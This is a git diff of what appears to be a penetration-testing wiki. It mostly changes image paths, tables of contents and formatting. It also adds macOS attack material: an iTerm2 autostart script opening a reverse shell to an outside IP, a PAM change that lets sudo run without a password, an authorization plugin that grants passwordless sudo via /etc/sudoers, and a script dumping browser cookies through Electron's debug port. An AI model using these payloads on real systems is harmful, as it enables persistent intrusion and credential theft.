Merge branch 'master' into master

README.md

@@ -40,7 +40,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
 
 ### [Intigriti](https://www.intigriti.com)
 
-<figure><img src=".gitbook/assets/image (2) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src=".gitbook/assets/image (2) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 **Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.**
 

SUMMARY.md

@@ -386,9 +386,12 @@
   * [Buckets](network-services-pentesting/pentesting-web/buckets/README.md)
     * [Firebase Database](network-services-pentesting/pentesting-web/buckets/firebase-database.md)
   * [CGI](network-services-pentesting/pentesting-web/cgi.md)
-  * [Source code Review / SAST Tools](network-services-pentesting/pentesting-web/code-review-tools.md)
   * [DotNetNuke (DNN)](network-services-pentesting/pentesting-web/dotnetnuke-dnn.md)
   * [Drupal](network-services-pentesting/pentesting-web/drupal.md)
+  * [Electron Desktop Apps](network-services-pentesting/pentesting-web/electron-desktop-apps/README.md)
+    * [Electron contextIsolation RCE via preload code](network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md)
+    * [Electron contextIsolation RCE via Electron internal code](network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md)
+    * [Electron contextIsolation RCE via IPC](network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md)
   * [Flask](network-services-pentesting/pentesting-web/flask.md)
   * [NodeJS Express](network-services-pentesting/pentesting-web/nodejs-express.md)
   * [Git](network-services-pentesting/pentesting-web/git.md)
@@ -427,6 +430,7 @@
   * [Python](network-services-pentesting/pentesting-web/python.md)
   * [Rocket Chat](network-services-pentesting/pentesting-web/rocket-chat.md)
   * [Special HTTP headers](network-services-pentesting/pentesting-web/special-http-headers.md)
+  * [Source code Review / SAST Tools](network-services-pentesting/pentesting-web/code-review-tools.md)
   * [Spring Actuators](network-services-pentesting/pentesting-web/spring-actuators.md)
   * [Symfony](network-services-pentesting/pentesting-web/symphony.md)
   * [Tomcat](network-services-pentesting/pentesting-web/tomcat.md)
@@ -438,10 +442,6 @@
   * [WebDav](network-services-pentesting/pentesting-web/put-method-webdav.md)
   * [Werkzeug / Flask Debug](network-services-pentesting/pentesting-web/werkzeug.md)
   * [Wordpress](network-services-pentesting/pentesting-web/wordpress.md)
-  * [XSS to RCE Electron Desktop Apps](network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/README.md)
-    * [Electron contextIsolation RCE via preload code](network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md)
-    * [Electron contextIsolation RCE via Electron internal code](network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md)
-    * [Electron contextIsolation RCE via IPC](network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/electron-contextisolation-rce-via-ipc.md)
 * [88tcp/udp - Pentesting Kerberos](network-services-pentesting/pentesting-kerberos-88/README.md)
   * [Harvesting tickets from Windows](network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md)
   * [Harvesting tickets from Linux](network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-linux.md)
@@ -585,7 +585,7 @@
   * [LFI2RCE Via compress.zlib + PHP\_STREAM\_PREFER\_STUDIO + Path Disclosure](pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php\_stream\_prefer\_studio-+-path-disclosure.md)
 * [File Upload](pentesting-web/file-upload/README.md)
   * [PDF Upload - XXE and CORS bypass](pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md)
-* [Formula/CSV/Doc/LaTeX Injection](pentesting-web/formula-doc-latex-injection.md)
+* [Formula/CSV/Doc/LaTeX/GhostScript Injection](pentesting-web/formula-csv-doc-latex-ghostscript-injection.md)
 * [HTTP Connection Contamination](pentesting-web/http-connection-contamination.md)
 * [HTTP Connection Request Smuggling](pentesting-web/http-connection-request-smuggling.md)
 * [HTTP Request Smuggling / HTTP Desync Attack](pentesting-web/http-request-smuggling/README.md)
@@ -611,6 +611,7 @@
   * [Bypassing SOP with Iframes - 1](pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md)
   * [Bypassing SOP with Iframes - 2](pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md)
   * [Steal postmessage modifying iframe location](pentesting-web/postmessage-vulnerabilities/steal-postmessage-modifying-iframe-location.md)
+* [Proxy / WAF Protections Bypass](pentesting-web/proxy-waf-protections-bypass.md)
 * [Race Condition](pentesting-web/race-condition.md)
 * [Rate Limit Bypass](pentesting-web/rate-limit-bypass.md)
 * [Registration & Takeover Vulnerabilities](pentesting-web/registration-vulnerabilities.md)

backdoors/salseo.md

@@ -99,7 +99,7 @@ Open the SalseoLoader project using Visual Studio.
 
 ### Add before the main function: \[DllExport]
 
-![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
+![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
 
 ### Install DllExport for this project
 

forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md

@@ -12,7 +12,7 @@
 
 </details>
 
-<img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -231,7 +231,7 @@ C:\Users\test\Desktop\test>pyinstaller --onefile hello.py
 
 * [https://blog.f-secure.com/how-to-decompile-any-python-binary/](https://blog.f-secure.com/how-to-decompile-any-python-binary/)
 
-<img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

generic-methodologies-and-resources/exfiltration.md

@@ -22,7 +22,7 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track
 
 ## Commonly whitelisted domains to exfiltrate information
 
-Check [https://lots-project.com/](https://lots-project.com/) to find commonly whitelisted domains taht can be abused
+Check [https://lots-project.com/](https://lots-project.com/) to find commonly whitelisted domains that can be abused
 
 ## Copy\&Paste Base64
 

generic-methodologies-and-resources/pentesting-network/README.md

@@ -31,7 +31,7 @@ You could also use **nmap** to send other types of ICMP packets (this will avoid
 ```bash
 ping -c 1 199.66.11.4    # 1 echo request to a host
 fping -g 199.66.11.0/24  # Send echo requests to ranges
-nmap -PEPM -sP -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests
+nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests
 ```
 
 ### TCP Port Discovery
@@ -130,7 +130,7 @@ But, as you are in the **same network** as the other hosts, you can do **more th
 
 * If you **ping** a **subnet broadcast address** the ping should be arrive to **each host** and they could **respond** to **you**: `ping -b 10.10.5.255`
 * Pinging the **network broadcast address** you could even find hosts inside **other subnets**: `ping -b 255.255.255.255`
-* Use the `-PEPM` flag of `nmap`to perform host discovery sending **ICMPv4 echo**, **timestamp**, and **subnet mask requests:** `nmap -PEPM -sP –vvv -n 10.12.5.0/24`
+* Use the `-PE`, `-PP`, `-PM` flags of `nmap`to perform host discovery sending respectively **ICMPv4 echo**, **timestamp**, and **subnet mask requests:** `nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24`
 
 ### **Wake On Lan**
 

linux-hardening/privilege-escalation/electron-cef-chromium-debugger-abuse.md

@@ -4,15 +4,11 @@
 
 <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
 
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-
-- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 </details>
 
@@ -108,7 +104,7 @@ Note that **NodeJS RCE exploits won't work** if connected to a browser via [**Ch
 ## RCE in NodeJS Debugger/Inspector
 
 {% hint style="info" %}
-If you came here looking how to get [**RCE from a XSS in Electron please check this page.**](../../network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/)
+If you came here looking how to get [**RCE from a XSS in Electron please check this page.**](../../network-services-pentesting/pentesting-web/electron-desktop-apps/)
 {% endhint %}
 
 Some common ways to obtain **RCE** when you can **connect** to a Node **inspector** is using something like (looks that this **won't work in a connection to Chrome DevTools protocol**):
@@ -127,7 +123,7 @@ In this section I will just list interesting things I find people have used to e
 
 ### Parameter Injection via Deep Links
 
-In the [**CVE-2021-38112**](https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/)  Rhino security discovered that an application based on CEF **registered a custom UR**I in the system (workspaces://) that received the full URI and then **launched the CEF based applicatio**n with a configuration that was partially constructing from that URI.
+In the [**CVE-2021-38112**](https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/) Rhino security discovered that an application based on CEF **registered a custom UR**I in the system (workspaces://) that received the full URI and then **launched the CEF based applicatio**n with a configuration that was partially constructing from that URI.
 
 It was discovered that the URI parameters where URL decoded and used to launch the CEF basic application, allowing a user to **inject** the flag **`--gpu-launcher`** in the **command line** and execute arbitrary things.
 
@@ -186,14 +182,10 @@ Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session"
 
 <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
 
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-
-- **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
 
 </details>

macos-hardening/macos-auto-start-locations.md

@@ -94,6 +94,10 @@ List all the agents and daemons loaded by the current user:
 launchctl list
 ```
 
+{% hint style="warning" %}
+If a plist is owned by a user, even if it's in a daemon system wide folders, the **task will be executed as the user** and not as root. This can prevent some privilege escalation attacks.
+{% endhint %}
+
 ### shell startup files
 
 Writeup: [https://theevilbit.github.io/beyond/beyond\_0001/](https://theevilbit.github.io/beyond/beyond\_0001/)\
@@ -439,6 +443,25 @@ EOF
 chmod +x "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.sh"
 ```
 
+or:
+
+```bash
+cat > "$HOME/Library/Application Support/iTerm2/Scripts/AutoLaunch/a.py" << EOF
+#!/usr/bin/env python3
+import iterm2,socket,subprocess,os
+
+async def main(connection):
+    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['zsh','-i']);
+    async with iterm2.CustomControlSequenceMonitor(
+            connection, "shared-secret", r'^create-window$') as mon:
+        while True:
+            match = await mon.async_get()
+            await iterm2.Window.async_create(connection)
+
+iterm2.run_forever(main)
+EOF
+```
+
 The script **`~/Library/Application Support/iTerm2/Scripts/AutoLaunch.scpt`** will also be executed:
 
 ```bash
@@ -449,7 +472,7 @@ The iTerm2 preferences located in **`~/Library/Preferences/com.googlecode.iterm2
 
 This setting can be configured in the iTerm2 settings:
 
-<figure><img src="../.gitbook/assets/image (2) (1).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (2) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 
 And the command is reflected in the preferences:
 
@@ -774,7 +797,7 @@ mv /tmp/folder.scpt "$HOME/Library/Scripts/Folder Action Scripts"
 
 Then, open the `Folder Actions Setup` app, select the **folder you would like to watch** and select in your case **`folder.scpt`** (in my case I called it output2.scp):
 
-<figure><img src="../.gitbook/assets/image (2) (1) (1).png" alt="" width="297"><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (2) (1) (1) (1).png" alt="" width="297"><figcaption></figcaption></figure>
 
 Now, if you open that folder with **Finder**, your script will be executed.
 
@@ -972,7 +995,7 @@ Writeup: [https://posts.specterops.io/saving-your-access-d562bf5bf90b](https://p
 * `~/Library/Screen Savers`
   * **Trigger**: Select the screen saver
 
-<figure><img src="../.gitbook/assets/image (1) (1) (1) (1).png" alt="" width="375"><figcaption></figcaption></figure>
+<figure><img src="../.gitbook/assets/image (1) (1) (1) (1) (1) (1).png" alt="" width="375"><figcaption></figcaption></figure>
 
 #### Description & Exploit
 
@@ -1243,6 +1266,10 @@ monthly_local="/etc/monthly.local"			# Local scripts
 
 If you manage to write any of the files `/etc/daily.local`, `/etc/weekly.local` or `/etc/monthly.local` it will be **executed sooner or later**.
 
+{% hint style="warning" %}
+Note that the periodic script will be **executed as the owner of the script**. So if a regular user owns the script, it will be executed as that user (this might prevent privilege escalation attacks).
+{% endhint %}
+
 ### PAM
 
 Writeup: [Linux Hacktricks PAM](../linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md)\
@@ -1259,6 +1286,37 @@ Writeup: [https://theevilbit.github.io/beyond/beyond\_0005/](https://theevilbit.
 
 As PAM is more focused in **persistence** and malware that on easy execution inside macOS, this blog won't give a detailed explanation, **read the writeups to understand this technique better**.
 
+Check PAM modules with:&#x20;
+
+```bash
+ls -l /etc/pam.d
+```
+
+A persistence/privilege escalation technique abusing PAM is as easy as modifying the module /etc/pam.d/sudo adding at the beginning the line:
+
+```bash
+auth       sufficient     pam_permit.so
+```
+
+So it will **looks like** something like this:
+
+```bash
+# sudo: auth account password session
+auth       sufficient     pam_permit.so
+auth       include        sudo_local
+auth       sufficient     pam_smartcard.so
+auth       required       pam_opendirectory.so
+account    required       pam_permit.so
+password   required       pam_deny.so
+session    required       pam_permit.so
+```
+
+And therefore any attempt to use **`sudo` will work**.
+
+{% hint style="danger" %}
+Note that this directory is protected by TCC so it's higly probably that the user will get a prompt asking for access.
+{% endhint %}
+
 ### Authorization Plugins
 
 Writeup: [https://theevilbit.github.io/beyond/beyond\_0028/](https://theevilbit.github.io/beyond/beyond\_0028/)\
@@ -1277,6 +1335,58 @@ Writeup: [https://posts.specterops.io/persistent-credential-theft-with-authoriza
 
 You can create an authorization plugin that will be executed when a user logs in to maintain persistence. For more information about how to create one of these plugins check the previous writeups (and be careful, a poorly written one can lock you out and you will need to clean your mac from recovery mode).
 
+```objectivec
+// Compile the code and create a real bundle
+// gcc -bundle -framework Foundation main.m -o CustomAuth
+// mkdir -p CustomAuth.bundle/Contents/MacOS
+// mv CustomAuth CustomAuth.bundle/Contents/MacOS/
+
+#import <Foundation/Foundation.h>
+
+__attribute__((constructor)) static void run()
+{
+    NSLog(@"%@", @"[+] Custom Authorization Plugin was loaded");
+    system("echo \"%staff ALL=(ALL) NOPASSWD:ALL\" >> /etc/sudoers");
+}
+```
+
+**Move** the bundle to the location to be loaded:
+
+```bash
+cp -r CustomAuth.bundle /Library/Security/SecurityAgentPlugins/
+```
+
+Finally add the **rule** to load this Plugin:
+
+
+
+```bash
+cat > /tmp/rule.plist <<EOF
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+            <key>class</key>
+            <string>evaluate-mechanisms</string>
+            <key>mechanisms</key>
+            <array>
+                <string>CustomAuth:login,privileged</string>
+            </array>
+        </dict>
+</plist>
+EOF
+
+security authorizationdb write com.asdf.asdf < /tmp/rule.plist
+```
+
+Trigger it with:
+
+```bash
+security authorize com.asdf.asdf
+```
+
+And then the **staff group should have sudo** access (read `/etc/sudoers` to confirm).
+
 ### Man.conf
 
 Writeup: [https://theevilbit.github.io/beyond/beyond\_0030/](https://theevilbit.github.io/beyond/beyond\_0030/)

macos-hardening/macos-red-teaming/README.md

@@ -53,7 +53,7 @@ Moreover, after finding proper credentials you could be able to brute-force othe
 
 #### JAMF device Authentication
 
-<figure><img src="../../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 The **`jamf`** binary contained the secret to open the keychain which at the time of the discovery was **shared** among everybody and it was: **`jk23ucnq91jfu9aj`**.\
 Moreover, jamf **persist** as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`**

macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md

@@ -22,7 +22,7 @@ Obviously, this is so powerful that it is **complicated to load a kernel extensi
 
 * When **entering recovery mode**, kernel **extensions must be allowed** to be loaded:
 
-<figure><img src="../../../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 * The kernel extension must be **signed with a kernel code signing certificate**, which can only be **granted by Apple**. Who will review in detail the company and the reasons why it is needed.
 * The kernel extension must also be **notarized**, Apple will be able to check it for malware.

macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md

@@ -21,7 +21,7 @@ It creates a 2 of names pipes per .Net process in [dbgtransportsession.cpp#L127]
 
 So, if you go to the users **`$TMPDIR`** you will be able to find **debugging fifos** you could use to debug .Net applications:
 
-<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 The function [**DbgTransportSession::TransportWorker**](https://github.com/dotnet/runtime/blob/0633ecfb79a3b2f1e4c098d1dd0166bc1ae41739/src/coreclr/debug/shared/dbgtransportsession.cpp#L1259) will handle the communication from a debugger.
 

macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-electron-applications-injection.md

@@ -62,7 +62,7 @@ Binary file Slack.app//Contents/Frameworks/Electron Framework.framework/Versions
 
 You could load this file in [https://hexed.it/](https://hexed.it/) and search for the previous string. After this string you can see in ASCII a number "0" or "1" indicating if each fuse is disabled or enabled. Just modify the hex code (`0x30` is `0` and `0x31` is `1`) to **modify the fuse values**.
 
-<figure><img src="../../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../.gitbook/assets/image (2) (1).png" alt=""><figcaption></figcaption></figure>
 
 Note that if you try to **overwrite** the **`Electron Framework` binary** inside an application with these bytes modified, the app won't run.
 
@@ -180,9 +180,21 @@ require('child_process').execSync('/System/Applications/Calculator.app/Contents/
 {% hint style="danger" %}
 If the fuse**`EnableNodeCliInspectArguments`** is disabled, the app will **ignore node parameters** (such as `--inspect`) when launched unless the env variable **`ELECTRON_RUN_AS_NODE`** is set, which will be also **ignored** if the fuse **`RunAsNode`** is disabled.
 
-However, you could still use the electron param `--remote-debugging-port=9229` but the previous payload won't work to execute other processes.
+However, you could still use the **electron param `--remote-debugging-port=9229`** but the previous payload won't work to execute other processes.
 {% endhint %}
 
+Using the param **`--remote-debugging-port=9222`** it's possible to steal some information from the Electron App like the **history** (with GET commands) or the **cookies** of the browser (as they are **decrypted** inside the browser and there is a **json endpoint** that will give them).
+
+You can learn how to do that in [**here**](https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e) and [**here**](https://slyd0g.medium.com/debugging-cookie-dumping-failures-with-chromiums-remote-debugger-8a4c4d19429f) and use the automatic tool [WhiteChocolateMacademiaNut](https://github.com/slyd0g/WhiteChocolateMacademiaNut) or a simple script like:
+
+```python
+import websocket
+ws = websocket.WebSocket()
+ws.connect("ws://localhost:9222/devtools/page/85976D59050BFEFDBA48204E3D865D00", suppress_origin=True)
+ws.send('{\"id\": 1, \"method\": \"Network.getAllCookies\"}')
+print(ws.recv()
+```
+
 ### Injection from the App Plist
 
 You could abuse this env variable in a plist to maintain persistence adding these keys:

macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md

@@ -339,9 +339,9 @@ This is the same function decompiled in a difefrent Hopper free version:
 
 Actually if you go to the function **`0x100004000`** you will find the array of **`routine_descriptor`** structs, the first element of the struct is the address where the function is implemented and the **struct takes 0x28 bytes**, so each 0x28 bytes (starting from byte 0) you can get 8 bytes and that be the **address of the function** that will be called:
 
-<figure><img src="../../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-<figure><img src="../../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 This data can be extracted [**using this Hopper script**](https://github.com/knightsc/hopper/blob/master/scripts/MIG%20Detect.py).
 

macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md

@@ -302,7 +302,7 @@ authenticate-session-owner, authenticate-session-owner-or-admin, authenticate-se
 
 If you find the function: **`[HelperTool checkAuthorization:command:]`** it's probably the the process is using the previously mentioned schema for authorization:
 
-<figure><img src="../../../../../.gitbook/assets/image (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+<figure><img src="../../../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
 Thisn, if this function is calling functions such as `AuthorizationCreateFromExternalForm`, `authorizationRightForCommand`, `AuthorizationCopyRights`, `AuhtorizationFree`, it's using [**EvenBetterAuthorizationSample**](https://github.com/brenwell/EvenBetterAuthorizationSample/blob/e1052a1855d3a5e56db71df5f04e790bfd4389c4/HelperTool/HelperTool.m#L101-L154).
 

macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/macos-xpc_connection_get_audit_token-attack.md

@@ -86,7 +86,7 @@ To perform the attack:
 3. What this means is that we can send XPC messages to `diagnosticd`, but any **messages `diagnosticd` sends go to `smd`**. 
    * For `smd`, both our and `diagnosticd`’s messages appear arrive on the same connection.
 
-<figure><img src="../../../../../../.gitbook/assets/image.png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../../../../../.gitbook/assets/image (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 
 4. We ask **`diagnosticd`** to **start monitoring** our (or any active) process and we **spam routine 1004 messages to `smd`** (to install a privileged tool).
 5. This creates a race condition that needs to hit a very specific window in `handle_bless`. We need the call to `xpc_connection_get_pid` to return the PID of our own process, as the privileged helper tool is in our app bundle. However, the call to `xpc_connection_get_audit_token` inside the `connection_is_authorized` function must use the audit token of `diganosticd`.
@@ -109,7 +109,7 @@ For this scenario we would need:
 
 We wait for _A_ to send us a message that expects a reply (1), instead of replying we take the reply port and use it for a message we send to _B_ (2). Then, we send a message that uses the forbidden action and we hope that it arrives concurrently with the reply from _B_ (3).
 
-<figure><img src="../../../../../../.gitbook/assets/image (1).png" alt="" width="563"><figcaption></figcaption></figure>
+<figure><img src="../../../../../../.gitbook/assets/image (1) (1) (1).png" alt="" width="563"><figcaption></figcaption></figure>
 
 ## Discovery Problems
 

macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md

@@ -33,16 +33,26 @@ In the function **`processRestricted`** the reason of the restriction is set. Ch
 
 * The binary is `setuid/setgid`
 * Existence of `__RESTRICT/__restrict` section in the macho binary.
-* The software has entitlements (hardened runtime) without [`com.apple.security.cs.allow-dyld-environment-variables`](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_allow-dyld-environment-variables) entitlement or [`com.apple.security.cs.disable-library-validation`](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_disable-library-validation).
+* The software has entitlements (hardened runtime) without [`com.apple.security.cs.allow-dyld-environment-variables`](https://developer.apple.com/documentation/bundleresources/entitlements/com\_apple\_security\_cs\_allow-dyld-environment-variables) entitlement
   * Check **entitlements** of a binary with: `codesign -dv --entitlements :- </path/to/bin>`
-* If the lib is signed with a different certificate as the binary
-  * If the lib & the bin are signed with the same cert, this will bypass the previous restrictions
-* Programs with the entitlements **`system.install.apple-software`** and **`system.install.apple-software.standar-user`** can **install software** signed by Apple without asking the user for a password (privesc)
 
 In more updated versions you can find this logic at the second part of the function **`configureProcessRestrictions`.** However, what is executed in newer versions is the **beginning checks of the function** (you can remove the ifs related to iOS or simulation as those won't be used in macOS.
 {% endhint %}
 
